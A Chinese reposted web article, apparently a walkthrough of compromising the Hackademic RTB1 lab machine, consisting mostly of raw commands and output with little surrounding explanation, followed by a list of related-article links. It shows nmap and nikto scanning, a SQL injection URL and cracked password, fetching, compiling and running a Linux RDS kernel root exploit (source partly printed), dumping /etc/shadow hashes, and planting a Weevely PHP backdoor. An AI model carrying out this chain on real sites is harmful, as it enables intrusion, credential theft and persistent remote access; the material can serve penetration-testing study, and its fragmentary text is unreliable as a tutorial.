黑客是怎样入侵你的网站的
来源:互联网 发布:c语言函数库 chm 编辑:程序博客网 时间:2024/06/11 04:47
转载:http://www.freebuf.com/articles/web/7359.html
1.DNS记录(A,NS,TXT,MX 和SOA)2.网站服务器的类型(Apache,IIS,Tomcat)3.域名的注册信息(哪个公司拥有这个域名)4.你的名字,地址,EMAIL和电话5.你的网站上所运行的脚本类型(PHP,ASP,ASP.NET,JSP,CFM)6.服务器的操作系统类型(Unix,Linux,Windows,Solaris)7.服务器对外开放的端口(80,443,21,等)
HACK-TEST.COM SITE INFORMATIONIP: 173.236.138.113Website Status: activeServer Type: ApacheAlexa Trend/Rank: 1 Month: 3,213,968 3 Month: 2,161,753Page Views per Visit: 1 Month: 2.0 3 Month: 3.7
root@bt:/# nmap -sV hack-test.comStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:39 EETNmap scan report for hack-test.com (192.168.1.2)Host is up (0.0013s latency).Not shown: 998 filtered portsPORT STATE SERVICE VERSION22/tcp closed ssh80/tcp open http Apache httpd 2.2.15 ((Fedora))MAC Address: 00:0C:29:01:8A:4D (VMware)Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds
root@bt:/# nmap -O hack-test.comStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:40 EETNmap scan report for hack-test.com (192.168.1.2)Host is up (0.00079s latency).Not shown: 998 filtered portsPORT STATE SERVICE22/tcp closed ssh80/tcp open httpMAC Address: 00:0C:29:01:8A:4D (VMware)Device type: general purposeRunning: Linux 2.6.XOS details: Linux 2.6.22 (Fedora Core 6)Network Distance: 1 hopOS detection performed. Please report any incorrect results at http://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds
root@bt:/pentest/web/nikto# perl nikto.pl -h http://hack-test.com- Nikto v2.1.4---------------------------------------------------------------------------+ Target IP: 192.168.1.2+ Target Hostname: hack-test.com+ Target Port: 80+ Start Time: 2011-12-29 06:50:03---------------------------------------------------------------------------+ Server: Apache/2.2.15 (Fedora)+ ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current.+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST+ OSVDB-3268: /icons/: Directory indexing found.+ OSVDB-3233: /icons/README: Apache default file found.+ 6448 items checked: 1 error(s) and 6 item(s) reported on remote host+ End Time: 2011-12-29 06:50:37 (34 seconds)---------------------------------------------------------------------------+ 1 host(s) tested
root@bt:/pentest/web/w3af# ./w3af_guiStarting w3af, running on:Python version:2.6.5 (r265:79063, Apr 16 2010, 13:57:41)[GCC 4.4.3]GTK version: 2.20.1PyGTK version: 2.17.0w3af - Web Application Attack and Audit FrameworkVersion: 1.2Revision: 4605Author: Andres Riancho and the w3af team.
http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220
明文密码是: q1w2e3用户名 “GeorgeMiller”
iduid=48(apache) gid=489(apache) groups=489(apache)pwd/var/www/html/Hackademic_RTB1/wp-content/pluginsuname -aLinux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
wget http://www.exploit-db.com/download/15285 -O roro.c--2011-12-28 00:48:01-- http://www.exploit-db.com/download/15285Resolving www.exploit-db.com... 199.27.135.111, 199.27.134.111Connecting to www.exploit-db.com|199.27.135.111|:80... connected.HTTP request sent, awaiting response... 301 Moved PermanentlyLocation: http://www.exploit-db.com/download/15285/ [following]--2011-12-28 00:48:02-- http://www.exploit-db.com/download/15285/Connecting to www.exploit-db.com|199.27.135.111|:80... connected.HTTP request sent, awaiting response... 200 OKLength: 7154 (7.0K) [application/txt]Saving to: `roro.c'0K ...... 100% 29.7K=0.2s
#include <stdio.h>#include <unistd.h>#include <stdlib.h>#include <fcntl.h>#include <sys/types.h>#include <sys/socket.h>#include <netinet/in.h>#include <errno.h>#include <string.h>#include <sys/ptrace.h>#include <sys/utsname.h>#define RECVPORT 5555#define SENDPORT 6666intprep_sock(intport){ints, ret;structsockaddr_in addr;s = socket(PF_RDS, SOCK_SEQPACKET, 0);if(s < 0) {printf(“[*] Could not open socket.\n”);exit(-1);}memset(&addr, 0, sizeof(addr));All the above lines indicate that this is exploit is written in C languageAfter we saved our exploit on server, we will compile it to elf format by typing
gcc roro.c –o roro
./roro[*] Linux kernel >= 2.6.30 RDS socket exploit[*] by Dan Rosenberg[*] Resolving kernel addresses...[+] Resolved rds_proto_ops to 0xe09f0b20[+] Resolved rds_ioctl to 0xe09db06a[+] Resolved commit_creds to 0xc044e5f1[+] Resolved prepare_kernel_cred to 0xc044e452[*] Overwriting function pointer...[*] Linux kernel >= 2.6.30 RDS socket exploit[*] by Dan Rosenberg[*] Resolving kernel addresses...[+] Resolved rds_proto_ops to 0xe09f0b20[+] Resolved rds_ioctl to 0xe09db06a[+] Resolved commit_creds to 0xc044e5f1[+] Resolved prepare_kernel_cred to 0xc044e452[*] Overwriting function pointer...[*] Triggering payload...[*] Restoring function pointer...
cat /etc/shadowroot:$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7:::bin:*:14495:0:99999:7:::daemon:*:14495:0:99999:7:::adm:*:14495:0:99999:7:::lp:*:14495:0:99999:7:::sync:*:14495:0:99999:7:::shutdown:*:14495:0:99999:7:::halt:*:14495:0:99999:7:::mail:*:14495:0:99999:7:::uucp:*:14495:0:99999:7:::operator:*:14495:0:99999:7:::games:*:14495:0:99999:7:::gopher:*:14495:0:99999:7:::ftp:*:14495:0:99999:7:::nobody:*:14495:0:99999:7:::vcsa:!!:14557::::::avahi-autoipd:!!:14557::::::ntp:!!:14557::::::dbus:!!:14557::::::rtkit:!!:14557::::::nscd:!!:14557::::::tcpdump:!!:14557::::::avahi:!!:14557::::::haldaemon:!!:14557::::::openvpn:!!:14557::::::apache:!!:14557::::::saslauth:!!:14557::::::mailnull:!!:14557::::::smmsp:!!:14557::::::smolt:!!:14557::::::sshd:!!:14557::::::pulse:!!:14557::::::gdm:!!:14557::::::p0wnbox.Team:$6$rPArLuwe8rM9Avwv$a5coOdUCQQY7NgvTnXaFj2D5SmggRrFsr6TP8g7IATVeEt37LUGJYvHM1myhelCyPkIjd8Yv5olMnUhwbQL76/:14981:0:99999:7:::mysql:!!:14981::::::
cat /etc/passwdroot:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologinvcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologinavahi-autoipd:x:499:498:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinrtkit:x:498:494:RealtimeKit:/proc:/sbin/nologinnscd:x:28:493:NSCD Daemon:/:/sbin/nologintcpdump:x:72:72::/:/sbin/nologinavahi:x:497:492:avahi-daemon:/var/run/avahi-daemon:/sbin/nologinhaldaemon:x:68:491:HAL daemon:/:/sbin/nologinopenvpn:x:496:490:OpenVPN:/etc/openvpn:/sbin/nologinapache:x:48:489:Apache:/var/www:/sbin/nologinsaslauth:x:495:488:"Saslauthd user":/var/empty/saslauth:/sbin/nologinmailnull:x:47:487::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:486::/var/spool/mqueue:/sbin/nologinsmolt:x:494:485:Smolt:/usr/share/smolt:/sbin/nologinsshd:x:74:484:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinpulse:x:493:483:PulseAudio System Daemon:/var/run/pulse:/sbin/nologingdm:x:42:481::/var/lib/gdm:/sbin/nologinp0wnbox.Team:x:500:500:p0wnbox.Team:/home/p0wnbox.Team:/bin/bashmysql:x:27:480:MySQL Server:/var/lib/mysql:/bin/bash
root@bt:/pentest/backdoors/web/weevely# ./main.py -Weevely 0.3 - Generate and manage stealth PHP backdoors.Copyright (c) 2011-2012 Weevely DevelopersWebsite: http://code.google.com/p/weevely/Usage: main.py [options]Options:-h, --help show this help message and exit-g, --generate Generate backdoor crypted code, requires -o and -p .-o OUTPUT, --output=OUTPUTOutput filename for generated backdoor .-c COMMAND, --command=COMMANDExecute a single command and exit, requires -u and -p.-t, --terminal Start a terminal-like session, requires -u and -p .-C CLUSTER, --cluster=CLUSTERStart in cluster mode reading items from the givefile, in the form 'label,url,password' where label isoptional.-p PASSWORD, --password=PASSWORDPassword of the encrypted backdoor .-u URL, --url=URL Remote backdoor URL .
root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p kokoWeevely 0.3 - Generate and manage stealth PHP backdoors.Copyright (c) 2011-2012 Weevely DevelopersWebsite: http://code.google.com/p/weevely/+ Backdoor file 'hax.php' created with password 'koko'.
root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -p kokoWeevely 0.3 - Generate and manage stealth PHP backdoors.Copyright (c) 2011-2012 Weevely DevelopersWebsite: http://code.google.com/p/weevely/+ Using method 'system()'.+ Retrieving terminal basic environment variables .[apache@HackademicRTB1 /var/www/html/Hackademic_RTB1/wp-content/plugins]
- 黑客是怎样入侵你的网站的
- 黑客是怎样入侵你的网站的
- 黑客是怎样入侵你的网站的
- 黑客是怎样入侵你的网站的
- 黑客是怎样入侵你的网站的
- 黑客是怎样入侵你的网站的
- 黑客是怎样入侵你的网站的
- 黑客是怎样入侵你的网站的
- 黑客是怎么入侵你的网站
- 国外黑客们的入侵网站思路
- 总结揭露黑客入侵网站的手法
- 国外黑客们的入侵网站思路
- 如何组织黑客入侵你的电脑
- 黑客如何入侵你的汽车?
- 黑客如何入侵你的汽车?
- 剖析网站遭遇的三次入侵 分析黑客入侵方法
- 剖析网站遭遇的入侵 分析黑客入侵方法
- 黑客是怎样“挂马”的
- 记录自己的投资心得理会(1)
- Code Style Guidelines for Contributors
- Android 调用已安装市场,进行软件评分的功能实现
- ios摇一摇的实现
- MFC中消息传递
- 黑客是怎样入侵你的网站的
- linux双机互传文件
- hadoop metrics 各参数解释
- Asp.net Design Pattern study notes -- PART 2
- 我做错什么了
- ubuntu .deb .tar.gz .tar.bz2 .rmp 和命令方式安装软件的方法
- Java中时间和空间的互换
- oracle forall
- ubuntu创建用户